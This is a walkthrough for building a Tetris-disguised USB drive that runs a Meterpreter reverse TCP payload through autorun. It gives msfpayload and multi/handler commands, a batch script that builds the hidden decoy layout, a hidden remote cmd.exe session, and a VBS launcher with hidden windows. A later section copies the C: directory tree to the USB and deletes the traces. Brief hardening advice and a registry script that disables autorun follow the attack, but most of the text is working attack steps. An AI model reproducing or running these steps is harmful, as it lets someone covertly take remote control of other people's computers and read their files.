In this case I will be creating a payload to be run on the computer I want to access: a Meterpreter reverse TCP executable that connects back to my machine as soon as it is run.
Gratz to Gitsnik for the assistance in getting through the parts where I got stuck :D
Using back|track 4 Pre Final
Open up a shell and, from the Metasploit framework directory, generate the executable:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 X > payload.exe
192.168.1.101 is the IP address of the machine I am running back|track from, i.e. the address the payload will connect back to (the X option tells msfpayload to output a Windows executable rather than raw shellcode).
This payload.exe is the file we need to get executed on the PC on our network that we would like to access.
To re-enact a more real-world situation, I have done the following:
> Got a small USB drive and set its volume label to "TETRIS".
> Renamed payload.exe to tetris.exe, copied it to the root of the USB drive and changed its attributes to 'hidden'.
> Copied a real Tetris executable to the root of the USB drive and renamed it -TETRIS-.exe.
> Created a batch file "start.bat" to run both tetris.exe and -TETRIS-.exe, and changed its attributes to 'hidden'.
> Created an autorun.inf to run the batch file, using the icon from the real Tetris executable and adding an action to the AutoPlay menu: "PLAY TETRIS". Changed its attributes to 'hidden' as well.
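As an added example (not part of the original post), here is a batch script that builds the USB layout described in the steps above when run from the root of the drive. It assumes payload.exe (the msfpayload output) and a legitimate Tetris binary, named here tetris_real.exe (an assumed name), have already been copied to the USB root. The original autorun.inf is not shown on the page, so the one written below is a reconstruction from the description using the standard keys Windows reads ([autorun], open, icon, action).

```batch
@echo off
rem Added example: build the decoy USB described above. Run from the USB root (for example E:\).
rem Assumes payload.exe (msfpayload output) and the real game saved as tetris_real.exe
rem (assumed name) are already in the current directory.

rem 1. Volume label shown in Explorer (applies to the current drive, so be on the USB).
label TETRIS

rem 2. Payload and decoy game under the names used in the walkthrough.
ren payload.exe tetris.exe
ren tetris_real.exe -TETRIS-.exe

rem 3. start.bat launches the payload and the real game together.
rem    The parenthesised block is redirected as a whole, so no trailing spaces end up in the file.
(
  echo @echo off
  echo start tetris.exe
  echo start -TETRIS-.exe
) > start.bat

rem 4. autorun.inf: run start.bat, borrow the game's icon and offer "PLAY TETRIS" in the AutoPlay menu.
(
  echo [autorun]
  echo open=start.bat
  echo icon=-TETRIS-.exe
  echo action=PLAY TETRIS
) > autorun.inf

rem 5. Hide everything except the real game so a stock Explorer shows only -TETRIS-.exe.
attrib +h tetris.exe
attrib +h start.bat
attrib +h autorun.inf

rem Show the result including hidden files.
dir /a
```

Note that on Windows XP the open= line of a removable drive is not executed silently: it appears as the top choice ("PLAY TETRIS", with the borrowed icon) in the AutoPlay dialog, which is the OK click the walkthrough relies on.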
On my main PC autorun is disabled and Explorer is set to show all hidden and system files, so when I open the drive it looks like this:
On most stock installs of Windows autorun is on and Explorer hides hidden files from view, so when inserting the USB you would see this instead:
To start the session we first need a listener (handler) on the attacking PC for the payload to connect back to.
In a shell, from the framework directory:
./msfconsole
Then in msfconsole, load the generic handler and give it the same payload and LHOST that were baked into payload.exe (LPORT defaults to 4444 on both sides, so it can be left alone), then start it:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
exploit
Now we insert the USB into a stock Windows machine (the target), consider ourselves witless, click OK in the AutoPlay prompt, and wait for the connection on our attacking machine.
After clicking OK the target PC shows a brief glimpse of a command-prompt window as start.bat launches tetris.exe and -TETRIS-.exe, followed by a (working) Tetris game opening:
Seeing a command prompt open and run a couple of exe files would wake most people up, but most people don't seem to worry about what is happening on the PC as long as it 'does what they want it to do'.
You can also make the first line of start.bat:
@echo off
This will still briefly open a command prompt, but it will no longer show which commands are being run.
After tetris.exe has run on the target's machine, msfconsole should open a Meterpreter session and the screen should change to:
You can then type:
execute -f cmd.exe -c -H -i
This gives you a command prompt on the target, hidden from the user at the keyboard (-H) and channelled back to you interactively (-c -i), from which you can browse the target's PC etc.
If a host firewall that filters outbound connections is installed, it will ask for permission to allow 'tetris.exe' to access the internet (the stock Windows XP firewall only filters inbound traffic, so it will not prompt at all). As the user has just started a Tetris program, this could well fool them into accepting.
So it goes to show:
> TURN AUTORUN OFF
> Be very careful about what you plug into your system
> Make sure you know precisely what you are allowing to access the internet
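To make the first point concrete, the following is an added example (not from the original post) of the registry settings that turn autorun off and make hidden files and extensions visible on Windows XP/Vista/7-era systems; run it from an administrative command prompt. The Explorer 'Advanced' values (Hidden, ShowSuperHidden, HideFileExt) are per-user and correspond to the Folder Options switches mentioned earlier as being set on the main PC.

```batch
@echo off
rem Added example: turn autorun off and show hidden/system files and extensions.
rem Run from an elevated command prompt; the HKLM keys need administrator rights.

set EXPLORER_POLICY=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer

rem NoDriveTypeAutoRun is a bit mask of drive types for which AutoRun is disabled;
rem 0xFF (255) covers every drive type, including removable (USB) and CD-ROM.
reg add "%EXPLORER_POLICY%" /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f

rem On XP/2003/Vista the NoDriveTypeAutoRun value is only honoured once the autorun
rem update (KB967715, earlier KB950582) is installed and HonorAutorunSetting is 1.
reg add "%EXPLORER_POLICY%" /v HonorAutorunSetting /t REG_DWORD /d 1 /f

rem Belt and braces: map autorun.inf to a non-existent registry key so Explorer never
rem parses the file at all, whatever the AutoPlay policy says.
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\IniFileMapping\Autorun.inf" /ve /t REG_SZ /d "@SYS:DoesNotExist" /f

rem Per-user Explorer view settings: show hidden files (Hidden=1; 2 hides them),
rem show protected operating-system files, and do not hide known file extensions,
rem so a "-TETRIS-.ini" or a hidden "tetris.exe" is visible for what it is.
set ADVANCED=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
reg add "%ADVANCED%" /v Hidden /t REG_DWORD /d 1 /f
reg add "%ADVANCED%" /v ShowSuperHidden /t REG_DWORD /d 1 /f
reg add "%ADVANCED%" /v HideFileExt /t REG_DWORD /d 0 /f

rem Verify. Explorer picks the view settings up after a log-off or a restart of explorer.exe.
reg query "%EXPLORER_POLICY%" /v NoDriveTypeAutoRun
reg query "%ADVANCED%" /v Hidden
```

The IniFileMapping entry is the most robust of the three autorun settings, because it stops autorun.inf being read rather than merely stopping the action from being offered; the two policy values are still worth setting so that Group Policy tooling reports the machine as compliant.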
===
I fine-tuned the files on the USB to be a little less obvious when starting up and, for fun, added a line to get a list of all files and directories on the C: drive.
Not that this has anything to do with the exploit, but it was fun to play around with ;)
So I created a .vbs file with the following code (the 0 passed to Run is the window style, i.e. hidden, which is what gets rid of the visible command prompt):
' Start the batch file in a hidden window (window style 0) so no command prompt is shown
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run Chr(34) & "-TETRIS-.bat" & Chr(34), 0
Set WshShell = Nothing
and named it -TETRIS-.vbs
Altered autorun.inf to start the .vbs file instead of the batch file:
Created a second autorun file, named tetris.inf, that points only to -TETRIS-.exe; the batch file later swaps it in to replace the original autorun.inf that points to -TETRIS-.vbs.
Altered the -TETRIS-.bat file to:
- list the folders and files on the C: drive, copy this listing to the USB, give it hidden attributes and delete the file from the host's C: drive.
- delete the original autorun file and replace it with one which only points to -TETRIS-.exe
- delete the -TETRIS-.vbs file
@echo off
rem Launch the real game and the payload (this is all the original start.bat did).
start -TETRIS-.exe && start Tetris.exe
rem Dump the directory tree of C: to a temp file, copy it to the USB as a hidden '.ini', then remove the temp file.
tree /f /a C:\ > c:\tree_c.lst && copy c:\tree_c.lst -TETRIS-.ini && attrib +h "-TETRIS-.ini" && del c:\tree_c.lst
rem Swap in the harmless autorun.inf (tetris.inf) that only points to the game; del needs the hidden bit cleared first.
attrib -h autorun.inf && attrib -h tetris.inf && del autorun.inf && ren tetris.inf autorun.inf
rem Remove the launcher script so the USB root looks like a plain game disk.
attrib -h "-TETRIS-.vbs" && del -TETRIS-.vbs
So basically, when OK is clicked after inserting the USB drive into a PC with autorun enabled, the payload is started, the Tetris game opens without any visible command prompt, and a list of all folders and files on the C: drive is made and copied to the USB drive as a hidden file named -TETRIS-.ini.
The new autorun.inf is not hidden and only points to the game, and the .vbs file is deleted.
I did this so that even if the unsuspecting user sees the hidden files, the names and types of the files look as if they belong to the Tetris game.
Anyone with any idea of how things work will of course see something is up ;)
Completely useless but fun to make :) even though the ugliness of it all will probably make Gitsnik cry..